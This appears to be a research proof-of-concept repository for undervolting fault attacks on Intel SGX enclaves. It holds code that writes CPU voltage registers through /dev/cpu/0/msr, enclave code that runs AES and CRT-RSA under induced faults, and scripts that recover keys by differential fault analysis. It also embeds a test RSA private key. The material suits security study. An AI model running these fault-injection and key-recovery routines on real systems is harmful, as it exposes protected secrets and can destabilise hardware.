21 |    (0x636f64656d696c6573636f64656d696c,0x6a6d736a75657475736a6d7374756574,0x02), # 4
22 |    (0xbaddecafbaddecafbaddecafbaddecaf,0xbaddecafbaddecafbaddecafbaddecaf,0xba), # 5
23 |    (0xdeadc0dedeadc0dedeadc0dedeadc0de,0xdeadc0dedeadc0dedeadc0dedeadc0de,0xde), # 6
24 |    (0x1234567890abcdef1234567890abcdef,0x10000005200000063000000740000008,0x02), # 7
25 |    (0x5ABB97CCFE5081A4598A90E1CEF1BC39,0x000102030405060708090a0b0c0d0e0f,0x02)] # 8
26 | 
27 | if __name__ == '__main__':
28 | 
29 |   assert int(sys.argv[1]) < len(vectors)
30 |   assert int(sys.argv[1]) >= 0
31 | 
32 |   v = vectors[int(sys.argv[1])]
33 | 
34 |   p = v[0]
35 |   key = v[1]
36 |   c = encrypt(p,key)
37 |   print ""
38 |   ct = encrypt(p,key,fault=v[2],floc=int(sys.argv[2]))
39 |   print "{:032x} {:032x}".format(c,ct)
40 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/find_key_from_differential_fault_analysis.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | source /home/kit/simple_curses/simple_curses.sh
 3 | #    .---------- constant part!
 4 | #    vvvv vvvv-- the code from above
 5 | RED='\033[0;31m'
 6 | GREEN='\033[0;32m'
 7 | YELLOW='\033[0;33m'
 8 | CYAN='\033[0;36m'
 9 | NC='\033[0m' # No Color
10 | 
11 | #Black        0;30     Dark Gray     1;30
12 | #Red          0;31     Light Red     1;31
13 | #Green        0;32     Light Green   1;32
14 | #Brown/Orange 0;33     Yellow        1;33
15 | #Blue         0;34     Light Blue    1;34
16 | #Purple       0;35     Light Purple  1;35
17 | #Cyan         0;36     Light Cyan    1;36
18 | #Light Gray   0;37     White         1;37
19 | 
20 | clear
21 | cat result_1.txt | grep cipher | cut -f3 -d' ' | tr '\r\n' ' ' > pair1.csv
22 | cat result_2.txt | grep cipher | cut -f3 -d' ' | tr '\r\n' ' ' > pair2.csv
23 | 
24 | #printf "${RED}"
25 | #printf "**************************************************************\n"
26 | #printf "**                   EXTRACTING THE KEY                     **\n"
27 | #printf "**************************************************************\n"
28 | #sleep 1
29 | printf "${GREEN}"
30 | printf "\nCorrect and faulty pair 1 (pair1.csv)\n"
31 | echo     "-------------------------------------"
32 | printf "${NC}"
33 | cat pair1.csv
34 | 
35 | printf "${GREEN}"
36 | printf "\n"
37 | printf "\nCorrect and faulty pair 2 (pair2.csv)\n"
38 | echo   	 "-------------------------------------"
39 | printf "${NC}"
40 | cat pair2.csv
41 | 
42 | printf "${GREEN}"
43 | printf "\n"
44 | printf "\nDifferential fault analysis\n"
45 | echo     "---------------------------"
46 | sleep 1
47 | printf "${NC}"
48 | printf "$ ./dfa 4 1 pair1.csv\n\n"
49 | dfa-aes-master/analysis/dfa 4 1 pair1.csv
50 | cat keys-0.csv|sort >  pair1_keys.csv
51 | 
52 | printf "\n$ ./dfa 4 1 pair2.csv\n\n"
53 | dfa-aes-master/analysis/dfa 4 1 pair2.csv
54 | cat keys-0.csv|sort >  pair2_keys.csv
55 | sleep 0.5
56 | 
57 | clear
58 | printf "${GREEN}"
59 | printf "\n\nFinding keys in both files\n"
60 | echo   "--------------------------"
61 | sleep 0.25
62 | printf "${NC}"
63 | printf "$ comm -1 -2 pair1_keys.csv pair2_keys.csv\n"
64 | printf "${YELLOW}\n"
65 | key=`comm -1 -2 pair1_keys.csv pair2_keys.csv`
66 | printf "******************************************************\n"
67 | printf "**       key: $key      **\n"
68 | printf "******************************************************\n"
69 | printf "\n ${NC}"
70 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/main.c:
--------------------------------------------------------------------------------
 1 | #include <sgx_urts.h>
 2 | #include "Enclave/encl_u.h"
 3 | #include <sys/mman.h>
 4 | #include <signal.h>
 5 | #include <curses.h>
 6 | #include <stdint.h>
 7 | #include <stdio.h>
 8 | #include <fcntl.h>
 9 | #include <unistd.h>
10 | #include <stdlib.h>
11 | #include <inttypes.h>
12 | 
13 | #define BUFLEN 2048
14 | #define SGX_AESGCM_MAC_SIZE 16
15 | #define SGX_AESGCM_IV_SIZE 12
16 | 
17 | #define ENCLAVE_FILE "CryptoEnclave.signed.so"
18 | 
19 | int fd;
20 | 
21 | /* OCall functions */
22 | void ocall_print_string(const char *str)
23 | {
24 | 	/* Proxy/Bridge will check the length and null-terminate 
25 | 	 * the input string to prevent buffer overflow. 
26 | 	 */
27 | 	printf("\t[Enclave] %s", str);
28 | 	refresh();
29 | }
30 | 
31 | 
32 | void ocall_voltage_change(uint64_t plane)
33 | {
34 | 	pwrite(fd, &plane, 8, 0x150);
35 | }
36 | 
37 | void ocall_phex(const uint8_t *print_me, int len)
38 | {
39 | 	char *output = malloc(len * 2 + 1);
40 | 	char *ptr = output;
41 | 	for (int i = 0; i < len; i++)
42 | 	{
43 | 		ptr += sprintf(ptr, "%02x", (uint8_t)print_me[i]);
44 | 	}
45 | 	printf("\t%s\n", output);
46 | 	free(output);
47 | }
48 | int main(int argc, char **argv)
49 | {
50 | 	sgx_launch_token_t token = {0};
51 | 	int retval = 0, updated = 0;
52 | 	char old = 0x00, new = 0xbb;
53 | 	sgx_enclave_id_t eid = 0;
54 | 	uint64_t ret;
55 | 	const char *program = argv[0];
56 | 
57 | 	if (argc != 3)
58 | 	{
59 | 		printf("Need 2 args: %s iterations undervolting \n", program);
60 | 		exit(-1);
61 | 	}
62 | 
63 | 	//SGX_ASSERT(sgx_create_enclave("./Enclave/encl.so", /*debug=*/1, &token, &updated, &eid, NULL));
64 | 	sgx_create_enclave("./Enclave/encl.so", /*debug=*/1, &token, &updated, &eid, NULL);
65 | 
66 | 	int j = 0;
67 | 
68 | 	int iterations = atoi(argv[1]);
69 | 	int64_t offset = strtol(argv[2], NULL, 10);
70 | 
71 | 	// open the register
72 | 	fd = open("/dev/cpu/0/msr", O_WRONLY);
73 | 	if (fd == -1)
74 | 	{
75 | 		printf("Could not open /dev/cpu/0/msr\n");
76 | 		return -1;
77 | 	}
78 | 	enclave_calculation(eid, iterations, offset);
79 | 	close(fd);
80 | 	//SGX_ASSERT(sgx_destroy_enclave(eid));
81 | 	sgx_destroy_enclave(eid);
82 | 	return 0;
83 | }
84 | 


--------------------------------------------------------------------------------
/sgx_crt_rsa/Enclave/Makefile:
--------------------------------------------------------------------------------
  1 | CC		  = gcc
  2 | AR		  = ar
  3 | LD		  = gcc
  4 | EDGER		  = sgx_edger8r
  5 | SIGNER		  = sgx_sign
  6 | INCLUDE       += -I$(SGX_SDK)/include/ -I$(SGX_SDK)/include/tlibc
  7 | 
  8 | T_CFLAGS	  = $(CFLAGS) -maes -fvisibility=hidden -fpie -fstack-protector -g -Os
  9 | U_CFLAGS	  = $(CFLAGS) -fvisibility=hidden -fpie -fstack-protector -g
 10 | AR_FLAGS	  = rcs
 11 | OBJECTS		  = encl.o
 12 | LIB_SGX_TRTS      = -lsgx_trts
 13 | LIB_SGX_TSERVICE  = -lsgx_tservice
 14 | 
 15 | ifeq ($(M32), 1)
 16 | 	T_CFLAGS += -m32 -msse2 -DM32=1
 17 | 	U_CFLAGS += -m32 -msse2
 18 | 	LD_FLAGS  = -m32
 19 | else
 20 | 	LIB_SUFX  = 64
 21 | endif
 22 | 
 23 | ENCLAVE_LIBS      = $(LIB_SGX_TRTS)
 24 | ENCLAVE_LIB_PARTS = -lsgx_tstdc -lsgx_tcrypto $(LIB_SGX_TSERVICE)
 25 | ENCLAVE	          = encl
 26 | PRIVATE_KEY       = private_key.pem
 27 | PUBLIC_KEY        = public_key.pem
 28 | KEY_SIZE          = 3072
 29 | ENCLAVE_EDL       = $(ENCLAVE).edl
 30 | ENCLAVE_CONFIG    = $(ENCLAVE).config.xml
 31 | OUTPUT_T          = $(ENCLAVE).so
 32 | OUTPUT_T_UNSIG    = $(ENCLAVE).unsigned.so
 33 | OUTPUT_U          = lib$(ENCLAVE)_proxy.a
 34 | LIB_DIRS          = -L $(SGX_SDK)/lib$(LIB_SUFX)/
 35 | LD_FLAGS         += -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles \
 36 |                     -Wl,--whole-archive -Wl,--start-group $(ENCLAVE_LIBS) -Wl,--end-group \
 37 |                     -Wl,--no-whole-archive -Wl,--start-group $(ENCLAVE_LIB_PARTS) -Wl,--end-group \
 38 |                     -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \
 39 |                     -Wl,-pie,-eenclave_entry -Wl,--export-dynamic  \
 40 |                     -Wl,--defsym,__ImageBase=0 
 41 | TRUSTED_OBJECTS   = $(ENCLAVE)_t.o
 42 | UNTRUSTED_OBJECTS = $(ENCLAVE)_u.o 
 43 | TRUSTED_CODE      = $(ENCLAVE)_t.h $(ENCLAVE)_t.c
 44 | UNTRUSTED_CODE    = $(ENCLAVE)_u.h $(ENCLAVE)_u.c
 45 | 
 46 | #.SILENT:
 47 | all: $(OUTPUT_T) $(OUTPUT_U)
 48 | 
 49 | $(OUTPUT_T) : $(TRUSTED_OBJECTS) $(OBJECTS) $(PRIVATE_KEY)
 50 | 	echo "$(INDENT)[LD]  " $(OBJECTS) $(TRUSTED_OBJECTS) $(ENCLAVE_LIBS) $(ENCLAVE_LIBS_PARTS) $(OUTPUT_T_UNSIG)
 51 | 	$(LD) $(OBJECTS) $(TRUSTED_OBJECTS) $(LD_FLAGS) $(LIB_DIRS) -o $(OUTPUT_T_UNSIG) 
 52 | 	
 53 | 	echo "$(INDENT)[SGN]" $(OUTPUT_T_UNSIG)
 54 | 	$(SIGNER) sign -key $(PRIVATE_KEY) -enclave $(OUTPUT_T_UNSIG) -out $(OUTPUT_T) -config $(ENCLAVE_CONFIG) > /dev/null 2> /dev/null
 55 | 
 56 | $(OUTPUT_U) : $(UNTRUSTED_OBJECTS) 
 57 | 	echo "$(INDENT)[AR]  " $(OUTPUT_U)
 58 | 	$(AR) $(AR_FLAGS) $(OUTPUT_U) $(UNTRUSTED_OBJECTS) 
 59 | 	
 60 | %_t.o : $(subst .o,.c,$@) edger
 61 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(trusted edge)"
 62 | 	touch $(subst .o,.c,$@)
 63 | 	$(CC) -c $(INCLUDE) $(T_CFLAGS) $(subst .o,.c,$@)
 64 | 
 65 | %_u.o : $(subst .o,.c,$@) edger
 66 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(untrusted edge)"
 67 | 	touch $(subst .o,.c,$@)
 68 | 	$(CC) -c $(INCLUDE) $(U_CFLAGS) $(subst .o,.c,$@)
 69 | 
 70 | %.o : %.c edger
 71 | 	echo "$(INDENT)[CC] " $< "(core)"
 72 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 73 | 
 74 | %.o : %.S
 75 | 	echo "$(INDENT)[AS] " $< "(core)"
 76 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $< -o $@
 77 | 
 78 | asm.s: build_asm.py
 79 | 	./build_asm.py
 80 | 
 81 | edger: $(ENCLAVE).edl
 82 | 	echo "$(INDENT)[GEN]" $(EDGER) $(ENCLAVE_EDL)
 83 | 	$(EDGER) $(ENCLAVE_EDL)
 84 | 	
 85 | .PHONY: force_check
 86 | force_check:
 87 | 	true
 88 | 
 89 | .PHONY: scrub
 90 | scrub: 
 91 | 	echo "$(INDENT)[RM]  " $(PRIVATE_KEY) $(PUBLIC_KEY)
 92 | 	$(RM) $(PRIVATE_KEY) $(PUBLIC_KEY)
 93 | 
 94 | $(PRIVATE_KEY): 
 95 | 	echo "$(INDENT)[GEN] $(PRIVATE_KEY) ($(KEY_SIZE) bits)"
 96 | 
 97 | 	# generate 3072 bit private RSA key
 98 | 	openssl genrsa -out $(PRIVATE_KEY) -3 $(KEY_SIZE)
 99 | 	
100 | 	echo "$(INDENT)[EXT] $(PUBLIC_KEY)"
101 | 	# extract public key
102 | 	openssl rsa -in $(PRIVATE_KEY) -pubout -out $(PUBLIC_KEY) 
103 | 	
104 | 	# sign enclave
105 | 	#sgx_sign sign -key private_key.pem -enclave Enclave/encl.so -out encl.signed.so
106 | 	
107 | .PHONY: clean
108 | clean:
109 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
110 | 	$(RM) $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
111 | 	echo "$(INDENT)[RM]" $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
112 | 	$(RM) $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
113 | 


--------------------------------------------------------------------------------
/sgx_crt_rsa/Enclave/encl.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  This file is part of the SGX-Step enclave execution control framework.
  3 |  *
  4 |  *  Copyright (C) 2017 Jo Van Bulck <jo.vanbulck@cs.kuleuven.be>,
  5 |  *                     Raoul Strackx <raoul.strackx@cs.kuleuven.be>
  6 |  *
  7 |  *  SGX-Step is free software: you can redistribute it and/or modify
  8 |  *  it under the terms of the GNU General Public License as published by
  9 |  *  the Free Software Foundation, either version 3 of the License, or
 10 |  *  (at your option) any later version.
 11 |  *
 12 |  *  SGX-Step is distributed in the hope that it will be useful,
 13 |  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 |  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 15 |  *  GNU General Public License for more details.
 16 |  *
 17 |  *  You should have received a copy of the GNU General Public License
 18 |  *  along with SGX-Step. If not, see <http://www.gnu.org/licenses/>.
 19 |  */
 20 | 
 21 | #include <stdint.h>
 22 | #include <stdio.h>
 23 | #include <string.h>
 24 | #include <stdlib.h>
 25 | #include "sgx_trts.h"
 26 | #include "sgx_tcrypto.h"
 27 | #include "encl_t.h"	// for ocall
 28 | #include <ipp/ippcp.h>
 29 | 
 30 | #define RSA_LEN 256
 31 | 
 32 | #define MAX(a,b) (((a)>(b))?(a):(b))
 33 | 
 34 | static void eprintf(const char *fmt, ...)
 35 | {
 36 |     char buf[1000] = {'\0'};
 37 |     va_list ap;
 38 |     va_start(ap, fmt);
 39 |     vsnprintf(buf, 1000, fmt, ap);
 40 |     va_end(ap);
 41 |     ocall_print_string(buf);
 42 | }
 43 | 
 44 | static uint8_t rsa_inited = 0;
 45 | 
 46 | IppsBigNumState* create_BN_state(int len, const Ipp32u* pData)  
 47 | {
 48 |     int size;
 49 |     
 50 |     ippsBigNumGetSize(len, &size);
 51 |     IppsBigNumState* pBN = (IppsBigNumState*) malloc(size);
 52 | 
 53 |     if(pBN == 0)
 54 |     {
 55 |         eprintf("create_BN_state(): malloc(%d) failed\n", size);
 56 |         return 0;
 57 |     }
 58 | 
 59 |     ippsBigNumInit(len, pBN);
 60 | 
 61 |     if (pData != NULL) 
 62 |     {
 63 |         ippsSet_BN(IppsBigNumPOS, len, pData, pBN);
 64 |     }
 65 | 
 66 |     return pBN;
 67 | }
 68 | 
 69 | const static char HexDigitList[] = "0123456789ABCDEF";
 70 | 
 71 | IppsBigNumState* create_BN_state_from_string(const char* s)
 72 | {
 73 |     if(!( '0' == s[0]) && (('x' == s[1]) || ('X' == s[1])))
 74 |     {
 75 |         return 0;
 76 |     }
 77 | 
 78 |     s += 2;
 79 | 
 80 |     const size_t len_in_nibbles = strlen(s);
 81 | 
 82 |     // Must be dword aligned, add leading zeroes if not
 83 |     if((len_in_nibbles % 8) != 0)
 84 |     {
 85 |         return 0;
 86 |     }
 87 | 
 88 |     const size_t len_in_dword = (int)(len_in_nibbles + 7)/8;
 89 | 
 90 |     Ipp32u* num = calloc(len_in_dword, sizeof(Ipp32u));
 91 | 
 92 |     if(num == 0)
 93 |     {
 94 |         return 0;
 95 |     } 
 96 | 
 97 |     int nibble_in_dword = 7;
 98 |     Ipp32u current_dword = 0;
 99 |     int dword_idx = len_in_dword - 1;
100 | 
101 |     for(unsigned int i = 0; i < len_in_nibbles; i++)
102 |     {
103 |         // Convert digit to hex
104 |         const char tmp[2] = {s[i], 0};
105 |         Ipp32u digit = (Ipp32u)strcspn(HexDigitList, tmp);
106 | 
107 |         current_dword |= digit << 4*nibble_in_dword; 
108 | 
109 |         if(nibble_in_dword == 0)
110 |         {
111 |             nibble_in_dword = 7;
112 |             num[dword_idx] = current_dword;
113 |             eprintf("DW: %08x\n", current_dword);
114 | 
115 |             current_dword = 0;
116 |             dword_idx--;
117 |         }
118 |         else
119 |         {
120 |             nibble_in_dword--;
121 |         }
122 |     }
123 | 
124 |     IppsBigNumState* result = create_BN_state(len_in_dword, num);
125 | 
126 |     eprintf("create_BN_state() = %p\n", result);
127 |     
128 |     free(num);
129 | 
130 |     return result;
131 | }
132 | 
133 | static IppsBigNumState *P = 0, *Q = 0, *dP = 0, *dQ = 0, *invQ = 0, *D = 0, *N = 0, *E = 0;
134 | static IppsBigNumState *pt = 0, *ct = 0;
135 | 
136 | static IppsRSAPrivateKeyState* pPrv = 0;
137 | static IppsRSAPublicKeyState* pPub = 0;
138 | static Ipp8u* scratchBuffer = 0;
139 | static IppsBigNumState* dec = 0;
140 | 
141 | #define INIT_CHECK(n, s) (n) = create_BN_state_from_string((s)); \
142 |     if((n) == 0)                                                 \
143 |     {                                                            \
144 |         eprintf("Could not init big num\n");                     \
145 |         return 0;                                                \
146 |     }
147 | 
148 | uint8_t rsa_init_ecall()
149 | {
150 |     if(rsa_inited != 0)
151 |     {
152 |         eprintf("RSA already initialised\n");
153 |         return 0;
154 |     }
155 | 
156 |     eprintf("Init P...\n");
157 |     INIT_CHECK(P,    "0xEECFAE81B1B9B3C908810B10A1B5600199EB9F44AEF4FDA493B81A9E3D84F632124EF0236E5D1E3B7E28FAE7AA040A2D5B252176459D1F397541BA2A58FB6599");
158 | 
159 |     eprintf("Init Q...");
160 |     INIT_CHECK(Q,    "0xC97FB1F027F453F6341233EAAAD1D9353F6C42D08866B1D05A0F2035028B9D869840B41666B42E92EA0DA3B43204B5CFCE3352524D0416A5A441E700AF461503");
161 | 
162 |     INIT_CHECK(dP,   "0x54494CA63EBA0337E4E24023FCD69A5AEB07DDDC0183A4D0AC9B54B051F2B13ED9490975EAB77414FF59C1F7692E9A2E202B38FC910A474174ADC93C1F67C981");
163 |     INIT_CHECK(dQ,   "0x471E0290FF0AF0750351B7F878864CA961ADBD3A8A7E991C5C0556A94C3146A7F9803F8F6F8AE342E931FD8AE47A220D1B99A495849807FE39F9245A9836DA3D");
164 |     INIT_CHECK(invQ, "0xB06C4FDABB6301198D265BDBAE9423B380F271F73453885093077FCD39E2119FC98632154F5883B167A967BF402B4E9E2E0F9656E698EA3666EDFB25798039F7");
165 |     INIT_CHECK(N,    "0xBBF82F090682CE9C2338AC2B9DA871F7368D07EED41043A440D6B6F07454F51FB8DFBAAF035C02AB61EA48CEEB6FCD4876ED520D60E1EC4619719D8A5B8B807FAFB8E0A3DFC737723EE6B4B7D93A2584EE6A649D060953748834B2454598394EE0AAB12D7B61A51F527A9A41F6C1687FE2537298CA2A8F5946F8E5FD091DBDCB");
166 |     INIT_CHECK(D,    "0xA5DAFC5341FAF289C4B988DB30C1CDF83F31251E0668B42784813801579641B29410B3C7998D6BC465745E5C392669D6870DA2C082A939E37FDCB82EC93EDAC97FF3AD5950ACCFBC111C76F1A9529444E56AAF68C56C092CD38DC3BEF5D20A939926ED4F74A13EDDFBE1A1CECC4894AF9428C2B7B8883FE4463A4BC85B1CB3C1");
167 |     INIT_CHECK(E,    "0x00000011");
168 |     INIT_CHECK(pt,   "0x00EB7A19ACE9E3006350E329504B45E2CA82310B26DCD87D5C68F1EEA8F55267C31B2E8BB4251F84D7E0B2C04626F5AFF93EDCFB25C9C2B3FF8AE10E839A2DDB4CDCFE4FF47728B4A1B7C1362BAAD29AB48D2869D5024121435811591BE392F982FB3E87D095AEB40448DB972F3AC14F7BC275195281CE32D2F1B76D4D353E2D");
169 |     INIT_CHECK(ct,   "0x1253E04DC0A5397BB44A7AB87E9BF2A039A33D1E996FC82A94CCD30074C95DF763722017069E5268DA5D1C0B4F872CF653C11DF82314A67968DFEAE28DEF04BB6D84B1C31D654A1970E5783BD6EB96A024C2CA2F4A90FE9F2EF5C9C140E5BB48DA9536AD8700C84FC9130ADEA74E558D51A74DDF85D8B50DE96838D6063E0955");
170 | 
171 |      // Do RSA dec
172 |     int keyCtxSize;
173 | 
174 |     // (bit) size of key components
175 |     int bitsN = RSA_LEN * 8;
176 |     int bitsE = 8;
177 |     int bitsP = RSA_LEN * 4;
178 |     int bitsQ = RSA_LEN * 4;
179 | 
180 |     // define and setup public key
181 |     ippsRSA_GetSizePublicKey(bitsN, bitsE, &keyCtxSize);
182 |     pPub = (IppsRSAPublicKeyState*)( calloc(keyCtxSize, sizeof(Ipp8u)) );
183 | 
184 |     if(pPub == 0)
185 |     {
186 |         eprintf("Failed to alloc pPub\n");
187 |         return 0;
188 |     }
189 | 
190 |     ippsRSA_InitPublicKey(bitsN, bitsE, pPub, keyCtxSize);
191 |     ippsRSA_SetPublicKey(N, E, pPub);
192 | 
193 |     // define and setup (type2) private key
194 |     ippsRSA_GetSizePrivateKeyType2(bitsP, bitsQ, &keyCtxSize);
195 |     pPrv = (IppsRSAPrivateKeyState*)( calloc(keyCtxSize, sizeof(Ipp8u)) );
196 | 
197 |     if(pPrv == 0)
198 |     {
199 |         eprintf("Failed to alloc pPrv\n");
200 |         return 0;
201 |     }
202 | 
203 |     ippsRSA_InitPrivateKeyType2(bitsP, bitsQ, pPrv, keyCtxSize);
204 |     ippsRSA_SetPrivateKeyType2(P, Q, dP, dQ, invQ, pPrv);
205 | 
206 |     // allocate scratch buffer
207 |     int buffSizePublic;
208 |     ippsRSA_GetBufferSizePublicKey(&buffSizePublic, pPub);
209 |     int buffSizePrivate;
210 |     ippsRSA_GetBufferSizePrivateKey(&buffSizePrivate, pPrv);
211 |     int buffSize = MAX(buffSizePublic, buffSizePrivate);
212 |     scratchBuffer = calloc(buffSize, sizeof(Ipp8u) );
213 | 
214 |     if(scratchBuffer == 0)
215 |     {
216 |         eprintf("Failed to alloc scratchBuffer\n");
217 |         return 0;
218 |     }
219 | 
220 |     dec = create_BN_state(RSA_LEN / 4, 0);
221 | 
222 |     if(dec == 0)
223 |     {
224 |         eprintf("Failed to alloc decryption result dec\n");
225 |         return 0;
226 |     }
227 | 
228 | 
229 |     rsa_inited = 1;
230 |     return 1;
231 | }
232 | 
233 | uint8_t rsa_clean_ecall()
234 | {
235 |     if(rsa_inited != 1)
236 |     {
237 |         eprintf("RSA not initialised\n");
238 |         return 0;
239 |     }
240 | 
241 |     // Cleanup
242 |     free(dec);
243 |     free(scratchBuffer);
244 |     free(pPub);
245 |     free(pPrv);
246 |     free(P);
247 |     free(Q);
248 |     free(dP);
249 |     free(dQ);
250 |     free(invQ);
251 |     free(N);
252 |     free(D);
253 |     free(E);
254 |     free(ct);
255 |     free(pt);
256 | 
257 |     return 1;
258 | }
259 | 
260 | void trigger_fault(int iterations)
261 | {
262 |     volatile uint64_t var = 0xdeadbeef;
263 |     volatile uint32_t not_used = 0xdead;
264 | 
265 |     for (int j = 0; j < 50000 - iterations;j++)
266 |     {
267 |         not_used = not_used * 0x12345;
268 |     }
269 | 
270 |     // Trigger wait
271 |     uint64_t random_value = 0x1122334455667788;
272 |     var = 0xdeadbeef * random_value;
273 |     int i = 0;
274 |     while (var == 0xdeadbeef * random_value && i < 10000000)
275 |     {
276 |         i++;
277 |         var = 0xdeadbeef;
278 |         var *= random_value;
279 |     }
280 | }
281 | 
282 | uint8_t rsa_dec_ecall(uint8_t result[RSA_LEN], int iterations)
283 | {
284 |     IppsBigNumSGN sgn;
285 | 
286 |     if(rsa_inited != 1)
287 |     {
288 |         eprintf("RSA not initialised\n");
289 |         return 0;
290 |     }
291 | 
292 |     // Wait for first fault
293 |     trigger_fault(iterations);
294 | 
295 |     // Actual decryption
296 |     ippsRSA_Decrypt(ct, dec, pPrv, scratchBuffer);
297 | 
298 |     int result_len = RSA_LEN / 4;
299 |     ippsGet_BN(&sgn, &result_len, result, dec);
300 |   
301 | 
302 |     return 1;
303 | }
304 | 
305 | uint64_t multiply_ecall(int iterations)
306 | {
307 |     volatile uint64_t var = 0xdeadbeef;
308 |     volatile uint32_t not_used = 0xdead;
309 | 
310 |     for (int j = 0; j < 50000 - iterations;j++)
311 |     {
312 |         not_used = not_used * 0x12345;
313 |     }
314 | 
315 |     uint64_t random_value = 0x1122334455667788;
316 |     var = 0xdeadbeef * random_value;
317 |     int i = 0;
318 |     while (var == 0xdeadbeef * random_value && i < 10000000)
319 |     {
320 |         i++;
321 |         var = 0xdeadbeef;
322 |         var *= random_value;
323 |     }
324 | 
325 |     eprintf("Computed: %016llx\n", var);
326 |     eprintf("Expected: %016llx\n", 0xdeadbeef * random_value);
327 | 
328 |     var ^= 0xdeadbeef * random_value;
329 | 
330 |     eprintf("Diff:     %016llx\n", var);
331 | 
332 |     return var;
333 | }


--------------------------------------------------------------------------------
/sgx_crt_rsa/Enclave/encl.config.xml:
--------------------------------------------------------------------------------
 1 | <!-- Please refer to User's Guide for the explanation of each field -->
 2 | <EnclaveConfiguration>
 3 |   <ProdID>0</ProdID>
 4 |   <ISVSVN>0</ISVSVN>
 5 |   <StackMaxSize>0x40000</StackMaxSize>
 6 |   <HeapMaxSize>0x100000</HeapMaxSize>
 7 |   <TCSNum>1</TCSNum>
 8 |   <TCSPolicy>1</TCSPolicy>
 9 |   <DisableDebug>0</DisableDebug>
10 | </EnclaveConfiguration>
11 | 


--------------------------------------------------------------------------------
/sgx_crt_rsa/Enclave/encl.edl:
--------------------------------------------------------------------------------
 1 | enclave {
 2 | 	
 3 | 	trusted {
 4 | 		public uint64_t multiply_ecall(int iterations);
 5 | 		public uint8_t rsa_dec_ecall([out] uint8_t result[256], int iterations);
 6 | 		public uint8_t rsa_init_ecall();
 7 | 		public uint8_t rsa_clean_ecall();
 8 | 	};
 9 | 	
10 | 	untrusted {
11 | 	 	void ocall_print_string([in, string] const char *str);
12 | 	};
13 | };
14 | 


--------------------------------------------------------------------------------
/sgx_crt_rsa/Evaluation/eval.py:
--------------------------------------------------------------------------------
 1 | import math
 2 | 
 3 | def list_to_int(l):
 4 |     r = 0;
 5 |     
 6 |     for i in range(0, len(l)):
 7 |         r <<= 8;
 8 |         r |= l[len(l) - i - 1]
 9 |         
10 |     return r
11 | 
12 | def compute_GCD(x, y): 
13 |   
14 |    while(y): 
15 |        x, y = y, x % y 
16 |   
17 |    return x 
18 | 
19 | def egcd(a, b):
20 |     if a == 0:
21 |         return (b, 0, 1)
22 |     else:
23 |         g, y, x = egcd(b % a, a)
24 |         return (g, x - (b // a) * y, y)
25 | 
26 | def modinv(a, m):
27 |     g, x, y = egcd(a, m)
28 |     if g != 1:
29 |         raise Exception('modular inverse does not exist')
30 |     else:
31 |         return x % m
32 | 
33 | p = 0xEECFAE81B1B9B3C908810B10A1B5600199EB9F44AEF4FDA493B81A9E3D84F632124EF0236E5D1E3B7E28FAE7AA040A2D5B252176459D1F397541BA2A58FB6599
34 | q = 0xC97FB1F027F453F6341233EAAAD1D9353F6C42D08866B1D05A0F2035028B9D869840B41666B42E92EA0DA3B43204B5CFCE3352524D0416A5A441E700AF461503
35 | n = 0xBBF82F090682CE9C2338AC2B9DA871F7368D07EED41043A440D6B6F07454F51FB8DFBAAF035C02AB61EA48CEEB6FCD4876ED520D60E1EC4619719D8A5B8B807FAFB8E0A3DFC737723EE6B4B7D93A2584EE6A649D060953748834B2454598394EE0AAB12D7B61A51F527A9A41F6C1687FE2537298CA2A8F5946F8E5FD091DBDCB
36 | d = 0xA5DAFC5341FAF289C4B988DB30C1CDF83F31251E0668B42784813801579641B29410B3C7998D6BC465745E5C392669D6870DA2C082A939E37FDCB82EC93EDAC97FF3AD5950ACCFBC111C76F1A9529444E56AAF68C56C092CD38DC3BEF5D20A939926ED4F74A13EDDFBE1A1CECC4894AF9428C2B7B8883FE4463A4BC85B1CB3C1
37 | e = 17;
38 | 
39 | dP   = 0x54494CA63EBA0337E4E24023FCD69A5AEB07DDDC0183A4D0AC9B54B051F2B13ED9490975EAB77414FF59C1F7692E9A2E202B38FC910A474174ADC93C1F67C981
40 | dQ   = 0x471E0290FF0AF0750351B7F878864CA961ADBD3A8A7E991C5C0556A94C3146A7F9803F8F6F8AE342E931FD8AE47A220D1B99A495849807FE39F9245A9836DA3D
41 | invQ = 0xB06C4FDABB6301198D265BDBAE9423B380F271F73453885093077FCD39E2119FC98632154F5883B167A967BF402B4E9E2E0F9656E698EA3666EDFB25798039F7
42 | 
43 | # Test ciphertext
44 | ct = 0x1253E04DC0A5397BB44A7AB87E9BF2A039A33D1E996FC82A94CCD30074C95DF763722017069E5268DA5D1C0B4F872CF653C11DF82314A67968DFEAE28DEF04BB6D84B1C31D654A1970E5783BD6EB96A024C2CA2F4A90FE9F2EF5C9C140E5BB48DA9536AD8700C84FC9130ADEA74E558D51A74DDF85D8B50DE96838D6063E0955
45 | 
46 | # Correct plaintext
47 | pt_exp = 0x00EB7A19ACE9E3006350E329504B45E2CA82310B26DCD87D5C68F1EEA8F55267C31B2E8BB4251F84D7E0B2C04626F5AFF93EDCFB25C9C2B3FF8AE10E839A2DDB4CDCFE4FF47728B4A1B7C1362BAAD29AB48D2869D5024121435811591BE392F982FB3E87D095AEB40448DB972F3AC14F7BC275195281CE32D2F1B76D4D353E2D
48 | 
49 | # We can also compute the correct plaintext here...
50 | pt = pow(ct, d, n)
51 | 
52 | # CRT formula
53 | # mp = pow(ct, dP, p)
54 | # mq = pow(ct, dQ, q)
